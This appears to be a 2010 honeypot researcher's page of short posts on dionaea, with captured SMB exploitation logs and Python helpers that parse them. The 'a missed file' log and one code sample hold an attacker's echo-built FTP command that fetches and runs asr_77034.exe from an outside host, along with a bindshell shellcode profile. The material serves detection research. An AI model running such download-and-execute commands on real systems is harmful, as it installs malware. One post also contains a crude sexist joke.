
KFSensor 4.7 Trial Review

After reading Roger A. Grimes' review of the low-interaction honeypots KFSensor, HoneyPoint and Honeyd, and being surprised by the pricing scheme, I decided to test it; maybe I was missing something, and if not, I could at least double the price for dionaea.

Identifying toolkits

Attacks which are identified correctly are rather boring; failing attacks are interesting, as they provide more information on the problem.

As seen on Twitter:

<jcanto> workmate: 'Django is like a cheap whore: takes some time to understand her, but then it makes lots of stuff for a little spending'

As the Berlusconi in me was convinced rather instantly, I decided to give Django a shot.
The current project name is carniwwwhore, and as I know I suck at this web development stuff, I'm looking for people who want to participate, so this flower survives the cold season.

I basically just tested how to get things done with Django, and from what I can tell, jcanto's workmate is correct.
Due to my lack of love for HTML and CSS it looks ugly, but given the MVC structure and the use of templates, making it look pretty should be easy for somebody who wants a pretty presentation.


Given my obvious antipathy towards HTML, I spent most of the time on the filters …


Printing the connections recursively was a pain, but it works …

evasion

We heard you are connected ...

Looking at 'what happened' using readlogsqltree, it died with an exception while trying to decode the JSON-encoded profile of a shellcode:

2010-10-20 17:33:07
  connection 496731 smbd tcp accept 93.218.66.143:445 <- 118.111.33.215:4602 (496731 None)
   dcerpc bind: uuid '3919286a-b10c-11d0-9ba8-00c04fd92ef5' (DSSETUP) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '3919286a-b10c-11d0-9ba8-00c04fd92ef5' (DSSETUP) opnum 9 (DsRolerUpgradeDownlevelServer (MS04-11))
Traceback (most recent call last):
  File "/opt/dionaea/lib/python3.1/json/decoder.py", line 341, in raw_decode
    obj, end = self.scan_once(s, idx)
StopIteration

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "./readlogsqltree.py", line 322, in <module>
    print_db(options, args)
  File "./readlogsqltree.py", line 294, in print_db
    print_profiles(cursor, c['connection'], 2)
  File "./readlogsqltree.py", line 57, in print_profiles
    ' ' * indent, json.loads(profile['emu_profile_json'])))
  File "/opt/dionaea/lib/python3.1/json/__init__.py", line 291, in loads
    return _default_decoder.decode(s)
  File "/opt/dionaea/lib/python3.1/json/decoder.py", line 325, in decode
    obj, end = self.raw_decode(s, idx=_w(s, 0).end())
  File "/opt/dionaea/lib/python3.1/json/decoder.py", line 343, in raw_decode
    raise ValueError("No JSON object could be decoded")
ValueError: No JSON object could be decoded
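Two things a reader of the same sqlite table needs, shown here as an added example that is not readlogsqltree's code: tolerate an emu_profile_json row that is empty or not JSON (the failure above) instead of dying, and derive the 'service:' line from a profile's bind/listen/accept/CreateProcess sequence. The sample profile is constructed, trimmed from the profile shown in the 'a missed file' entry further down this page.

```python
import json

# Constructed sample, trimmed from the profile printed in the log below; dionaea
# stores the column as JSON, readlogsqltree prints the decoded Python repr.
SAMPLE_PROFILE_JSON = json.dumps([
    {"call": "WSASocket", "args": ["2", "1", "0", "0", "0", "0"], "return": "66"},
    {"call": "bind", "args": ["66", {"sin_port": "1130", "sin_family": "2",
                              "sin_addr": {"s_addr": "0.0.0.0"}}, "16"], "return": "0"},
    {"call": "listen", "args": ["66", "2"], "return": "0"},
    {"call": "accept", "args": ["66", {}, ""], "return": "68"},
    {"call": "CreateProcess", "return": "-1",
     "args": ["", "cmd", "", "", "1", "0", "", "",
              {"hStdInput": "68", "hStdOutput": "68", "hStdError": "68"},
              {"dwProcessId": "4712"}]},
])

def load_profile(raw):
    """Decode an emu_profile_json value; an empty or non-JSON row yields []
    instead of the ValueError that killed readlogsqltree."""
    if not raw:
        return []
    try:
        calls = json.loads(raw)
    except ValueError:          # json.JSONDecodeError is a ValueError
        return []
    return calls if isinstance(calls, list) else []

def classify_service(calls):
    """Return 'bindshell://PORT' when the profile binds, listens and accepts on
    one socket and then starts a process with the accepted socket as its
    stdin/stdout (the 'service:' line readlogsqltree prints), else None."""
    bound = {}      # listening socket fd -> port from the sockaddr_in
    accepted = {}   # accepted fd -> listening fd
    for c in calls:
        name, args, ret = c.get('call'), c.get('args', []), c.get('return')
        if name == 'bind' and len(args) >= 2 and isinstance(args[1], dict):
            bound[args[0]] = args[1].get('sin_port')
        elif name == 'accept' and args and args[0] in bound:
            accepted[ret] = args[0]
        elif name == 'CreateProcess' and len(args) > 8 and isinstance(args[8], dict):
            si = args[8]    # STARTUPINFO with the handles handed to the child
            fd = si.get('hStdInput')
            if fd in accepted and si.get('hStdOutput') == fd:
                return 'bindshell://%s' % bound[accepted[fd]]
    return None
```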

MS10-061 attacks?

I've been wondering already why there was no worm for MS10-061: the bug is reliable to exploit, you just upload a file and execute it, no shellcode and no language- or service-pack-specific offsets required; in other words, perfectly wormable.

Today I think I got the first traces of an automated exploitation of the bug. Due to some misunderstanding with the SMB protocol I did not receive a copy of the attacking malware, but there are some interesting details I want to share anyway.

XMPP Server

This guide explains how to install a Prosody XMPP server, patched for the sensor network, on a server called “sensors.example.com”.
My prosody repository is not meant to be a 'fork' of Prosody; it is just a convenience repository, so you do not have to merge the patches yourself.

The patches:

  • prevent messages from visitors getting sent to visitors
  • prevent messages sent from visitors or participants getting sent back to the source

This way, sensors can't read messages from other sensors (visitors), but can receive files from other sensors in a channel where the sensor user is a participant, and the sensors never get their own messages echoed back by the XMPP server.

virustotal api

I was messing with VirusTotal some time ago, and at that point in time you had to scrape the HTML output. Things have changed: VirusTotal offers a free HTTP API to interface with their services; all you have to do is sign up and get the API key, which is hidden deep in the web 2.0 interface.

Using the API, you have get_file_report, scan_file and make_comment.

alix - harddisk

As mentioned in the comments, the CF card in my ALIX died right after the installation, and I decided to hook up a 2.5” hard disk instead.
Getting the disk was trivial; it is a standard notebook hard disk, which can be bought almost everywhere.
Getting a 44-pin ATA cable to attach the disk to the ALIX board was a problem; after some weeks I ended up getting the cable, totally overpriced, on eBay due to a lack of alternatives.

The hard disk *has* to be slave; even if you do not have a CF card attached, you can't have the HDD being master.

a missed file

Looking at my dionaea readlogsql logs for the last 24h I spotted this:

2010-10-02 08:57:48
  connection 479687 smbd tcp accept 10.146.168.210:445 <- 10.168.211.184:42210 (479687 None)
   dcerpc bind: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid '7d705026-884d-af82-7b3d-961deaeb179a' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid '7f4fdfe9-2be7-4d6b-a5d4-aa3c831503a1' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid '8b52c8fd-cc85-3a74-8b15-29e030cdac16' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid '9acbde5b-25e1-7283-1f10-a3a292e73676' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid '9f7e2197-9e40-bec9-d7eb-a4b0f137fe95' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid 'a71e0ebe-6154-e021-9104-5ae423e682d0' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid 'b3332384-081f-0e95-2c4a-302cc3080783' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid 'c0cdf474-2d09-f37f-beb8-73350c065268' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid 'd89a50ad-b919-f35c-1c99-4153ad1e6075' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid 'ea256ce5-8ae1-c21b-4a17-568829eec306' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) opnum 31 (NetPathCanonicalize (MS08-67))
   profile: [{'return': '0x71a10000', 'args': ['ws2_32'], 'call': 'LoadLibraryA'}, {'return': '0', 'args': ['2', '1244280'], 'call': 'WSAStartup'}, {'return': '66', 'args': ['2', '1', '0', '0', '0', '0'], 'call': 'WSASocket'}, {'return': '0', 'args': ['66', {'sin_port': '1130', 'sin_addr': {'s_addr': '0.0.0.0'}, 'sin_zero': '       ', 'sin_family': '2'}, '16'], 'call': 'bind'}, {'return': '0', 'args': ['66', '2'], 'call': 'listen'}, {'return': '68', 'args': ['66', {}, ''], 'call': 'accept'}, {'return': '0', 'args': ['66'], 'call': 'closesocket'}, {'return': '-1', 'args': ['', 'cmd', '', '', '1', '0', '', '', {'dwXCountChars': '0', 'hStdInput': '68', 'wShowWindow': '0', 'dwYSize': '0', 'lpReserved2': '0', 'cbReserved2': '0', 'cb': '0', 'dwX': '0', 'dwY': '0', 'hStdOutput': '68', 'lpDesktop': '0', 'hStdError': '68', 'dwFlags': '0', 'dwYCountChars': '0', 'lpReserved': '0', 'lpTitle': '0', 'dwXSize': '0', 'dwFillAttribute': '0'}, {'dwProcessId': '4712', 'hThread': '4712', 'dwThreadId': '4714', 'hProcess': '4711'}], 'call': 'CreateProcess'}, {'return': '0', 'args': ['4712', '-1'], 'call': 'WaitForSingleObject'}, {'return': '0', 'args': ['68'], 'call': 'closesocket'}, {'return': '0', 'args': ['2088763392'], 'call': 'ExitThread'}]
   service: bindshell://1130
    connection 479689 remoteshell tcp listen 10.152.73.113:1130 (479687 479687)
      connection 479690 remoteshell tcp accept 10.152.73.113:1130 <- 10.182.132.14:42224 (479687 479689)

A proper exploitation, a proper remote shell, but for whatever reason there was no offer …

So, I looked up the data from the shell session for 10.152.73.113:1130 ← 10.182.132.14:42224.

[02102010 08:57:52] cmd dionaea/cmd.py:52-debug: DATA: b'echo open 10.232.44.205 33542 >> asr_ltjhy &echo user ltjhyh ltjhyh >> asr_ltjhy &echo get asr_77034.exe >> asr_ltjhy &echo quit >> asr_ltjhy &ftp -nv -s:asr_ltjhy &start asr_77034.exe\r\n'

It looked valid, and I was wondering why dionaea failed to detect the offer and download the file.
So I decided to reproduce the failure using the CLI in dionaea:
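The download script in that shell session, taken apart the way a honeypot's command handler has to in order to know which file it is being told to fetch. This is an added example, not dionaea's cmd.py; the sample command is a constructed copy of the DATA line above.

```python
import re

# Constructed copy of the bindshell command from the cmd.py DATA line above.
SAMPLE_CMD = ('echo open 10.232.44.205 33542 >> asr_ltjhy &echo user ltjhyh ltjhyh >> asr_ltjhy '
              '&echo get asr_77034.exe >> asr_ltjhy &echo quit >> asr_ltjhy '
              '&ftp -nv -s:asr_ltjhy &start asr_77034.exe\r\n')

ECHO_RE = re.compile(r'^echo\s+(.*?)\s*>>?\s*(\S+)$')   # echo LINE >> SCRIPT
FTP_RE = re.compile(r'^ftp\b.*?-s:(\S+)')               # ftp ... -s:SCRIPT

def ftp_offers(cmdline):
    """Reassemble ftp scripts written line by line with echo and return the
    ftp:// URLs that running each script with 'ftp -s:' would fetch."""
    scripts = {}        # script file name -> list of echoed lines
    run = []            # script files passed to ftp -s:
    for part in cmdline.strip().split('&'):
        part = part.strip()
        m = ECHO_RE.match(part)
        if m:
            scripts.setdefault(m.group(2), []).append(m.group(1))
            continue
        m = FTP_RE.match(part)
        if m:
            run.append(m.group(1))
    offers = []
    for name in run:
        host = port = user = password = None
        files = []
        for line in scripts.get(name, []):
            words = line.split()
            verb = words[0].lower() if words else ''
            if verb == 'open' and len(words) >= 2:
                host = words[1]
                port = words[2] if len(words) > 2 else '21'
            elif verb == 'user' and len(words) >= 2:
                user = words[1]
                password = words[2] if len(words) > 2 else ''
            elif verb in ('get', 'mget') and len(words) >= 2:
                files.extend(words[1:])
        if host:
            auth = '%s:%s@' % (user, password) if user else ''
            offers.extend('ftp://%s%s:%s/%s' % (auth, host, port, f) for f in files)
    return offers
```

Anything the parser does not understand (the `start` at the end, an unknown ftp verb) is simply ignored, so an offer is only reported when a complete open/get pair is present.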

dionaea emulates MS10-061

MS10-061 allows uploading a file to a remote computer using the printer service (spoolss); the spool service is then used to write an 'at command' to the AT service, scheduling a job in the future that basically runs the uploaded file.

While it is not perfect yet, it basically works.
What's missing for Metasploit:

  • the WritePrinter piped ATSVC command is lost
  • the piped NetShareEnum Trans command is lost - you have to set PNAME in metasploit

But, in the end, we already get the file, which is a good start.

Thanks to Tan Kean Siong for his contribution.

Below you can see how such an attack currently looks using readlogsqltree:

2010-09-26 20:53:37
  connection 25889 smbd tcp accept ::ffff:127.0.0.1:445 <- ::ffff:127.0.0.1:45470 (25889 None)
   dcerpc bind: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid '14d8483f-8f73-fc08-3b1b-c15070355ffe' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid '24b9a895-d259-b5d6-7f1c-e0196c35cb12' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid '2559f952-03e3-f9b2-662b-4e6f4fbfa993' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid '2815b485-8bcc-cbc6-a45c-1cca0bc8a928' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid '5877c11c-b7d6-92ac-b8e6-4a016a66d521' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid '8c5c0212-2c8b-e9de-8889-19b94be5063e' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid 'c186c5da-bfeb-d0a3-8751-e8e50eea0004' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid 'cc3824ba-b733-5994-5aab-186390e18f3e' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid 'd0e857b9-7929-9ab0-d61b-6f64c1543512' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid 'e89a99e6-2782-7bc4-3fe6-1d3d1dcf4b5f' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid 'faf39128-da8f-234f-a9f4-9d466e2f6fc3' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid 'fd6e11c8-d3ad-c481-7a20-0ba79198b65e' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid 'fedc56ef-4c84-abd6-0f34-ac63f9d512cb' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 69 (OpenPrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 17 (StartDocPrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 19 (WritePrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 19 (WritePrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 19 (WritePrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 19 (WritePrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 19 (WritePrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 19 (WritePrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 19 (WritePrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 19 (WritePrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 19 (WritePrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 19 (WritePrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 19 (WritePrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 19 (WritePrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 19 (WritePrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 19 (WritePrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 19 (WritePrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 19 (WritePrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 19 (WritePrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 19 (WritePrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 19 (WritePrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 23 (EndDocPrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 17 (StartDocPrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 19 (WritePrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 19 (WritePrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 19 (WritePrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 23 (EndDocPrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 29 (ClosePrinter ())
   profile: []
   offer: spoolss://::ffff:127.0.0.1/Xhbqy5httERSXV.exe
   download: 6b07a937c7a89f30206cfdf25b8331de spoolss://::ffff:127.0.0.1

gnuplotsql

smbd overview 2010
smb protocol stats for 2010 so far

gnuplotsql.py is a script I wrote to visualize the sqlite database in a useful way.

You can browse my statistics here while you use the script to create stats for your own database:

MSSQL attacks examined

Simplified version of the world.

Given the number of attacks reported on MSSQL, and the data I gathered over the last weeks, I decided to have a look at it.

start.txt · Last modified: 2010/10/13 12:09 by common